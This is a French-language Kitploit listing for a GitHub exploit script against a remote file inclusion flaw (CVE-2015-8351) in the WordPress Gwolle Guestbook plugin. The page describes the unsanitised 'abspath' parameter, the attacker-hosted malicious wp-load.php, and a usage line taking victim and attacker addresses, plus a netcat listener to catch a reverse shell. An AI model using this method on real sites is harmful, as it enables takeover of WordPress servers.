Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
exploit-CVE-2015-8351 — Plugin WordPress Gwolle Guestbook 1.5.3 - Inclusion de fichier distant | Kitploit
Outils/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

Plugin WordPress Gwolle Guestbook 1.5.3 - Inclusion de fichier distant

Voir le dépôt
2il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RFI du plugin WordPress Gwolle Guestbook

Ce script Python exploite une vulnérabilité critique d'inclusion de fichier distant (RFI) dans le plugin WordPress Gwolle Guestbook, qui peut être exploitée par un attaquant non authentifié pour inclure un fichier PHP distant et exécuter du code arbitraire sur le système vulnérable.

Détails de la vulnérabilité

Le paramètre HTTP GET "abspath" n'est pas correctement assaini avant d'être utilisé dans la fonction PHP require(). Un attaquant distant peut inclure un fichier nommé 'wp-load.php' depuis un serveur distant arbitraire et exécuter son contenu sur le serveur web vulnérable. Pour ce faire, l'attaquant doit placer un fichier 'wp-load.php' malveillant dans la racine des documents de son serveur et inclure l'URL du serveur dans la requête.

L'exploitation réussie de cette vulnérabilité peut entraîner le compromis de toute l'installation WordPress, et peut même conduire au compromis de l'ensemble du serveur web.

Utilisation

Le script nécessite trois arguments :

  • URL cible : L'URL de l'installation WordPress vulnérable.
  • Hôte attaquant : L'adresse IP ou le nom d'hôte de la machine de l'attaquant.
  • Port attaquant : Le numéro de port sur lequel l'attaquant écoute pour un reverse shell.

Exemple :

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

Remarque : Vous devez avoir un écouteur netcat ouvert sur la machine attaquante sur le port spécifié.

Avertissement

Ce script est fourni à des fins éducatives uniquement. L'auteur n'est pas responsable des dommages causés par une mauvaise utilisation de ce script.

Télécharger l’outil